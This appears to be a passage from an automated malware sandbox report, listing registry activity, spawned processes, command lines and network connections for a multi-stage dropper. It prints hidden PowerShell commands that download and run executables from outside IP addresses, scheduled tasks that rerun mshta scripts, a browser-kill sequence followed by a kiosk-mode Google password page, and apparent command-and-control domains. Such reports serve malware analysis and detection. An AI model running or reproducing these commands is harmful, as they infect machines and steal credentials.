| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe
"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"
C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe
"C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe
"C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn ysksUma2kSs /tr "mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn ysksUma2kSs /tr "mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE
"C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "aPbClmaJWPb" /tr "mshta \"C:\Temp\iH0BXcodL.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\iH0BXcodL.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe
"C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1480 -ip 1480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1480 -s 812
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe
"C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe"
C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe
"C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe
"C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe"
C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe
"C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe
"C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1868 -prefMapHandle 1860 -prefsLen 27376 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8990b8ae-a833-4c44-841c-ae4a0209ca20} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 28296 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0b6ece7-2e68-4d23-b9c6-0fdff8149e46} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3252 -childID 1 -isForBrowser -prefsHandle 3216 -prefMapHandle 3272 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5db327ae-8c4b-4101-bb8e-4cdbd912e4cd} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3860 -childID 2 -isForBrowser -prefsHandle 3916 -prefMapHandle 3912 -prefsLen 32786 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {126f1331-6857-434e-8479-8268beb7cd40} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4688 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4660 -prefMapHandle 4680 -prefsLen 32786 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5612e1bc-18af-40e5-9eed-f1310f5806d1} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" utility
C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe
"C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5240 -childID 3 -isForBrowser -prefsHandle 5228 -prefMapHandle 5248 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3950ba0-39ce-44ba-b6ea-5a025ad51a17} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4388 -childID 4 -isForBrowser -prefsHandle 5164 -prefMapHandle 5260 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4e1e00e-06e6-4fc0-a4e5-65aa0706e0f7} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5608 -childID 5 -isForBrowser -prefsHandle 5528 -prefMapHandle 5532 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6a37b2c-4e4b-4551-845a-73f50c1d5581} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe
"C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe"
C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6120 -ip 6120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 800
C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4484 -ip 4484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 808
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe"
C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\96B8.tmp\96B9.tmp\96BA.bat C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| GB | 2.18.66.72:443 | www.bing.com | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.64.1:443 | exarthynature.run | tcp |
| US | 104.21.64.1:443 | exarthynature.run | tcp |
| US | 104.21.64.1:443 | exarthynature.run | tcp |
| US | 104.21.64.1:443 | exarthynature.run | tcp |
| US | 104.21.64.1:443 | exarthynature.run | tcp |
| US | 104.21.64.1:443 | exarthynature.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| N/A | 127.0.0.1:54822 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| N/A | 127.0.0.1:54831 | tcp | |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| GB | 142.250.187.206:443 | youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.187.206:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 142.250.187.206:443 | youtube-ui.l.google.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 142.250.187.206:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| NL | 2.18.121.73:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r3---sn-aigzrnsl.gvt1.com | udp |
| GB | 74.125.168.232:443 | r3---sn-aigzrnsl.gvt1.com | tcp |
| US | 8.8.8.8:53 | r3.sn-aigzrnsl.gvt1.com | udp |
| US | 8.8.8.8:53 | r3.sn-aigzrnsl.gvt1.com | udp |
| GB | 74.125.168.232:443 | r3.sn-aigzrnsl.gvt1.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| GB | 74.125.168.232:443 | r3.sn-aigzrnsl.gvt1.com | tcp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| DE | 5.75.210.149:443 | tcp | |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
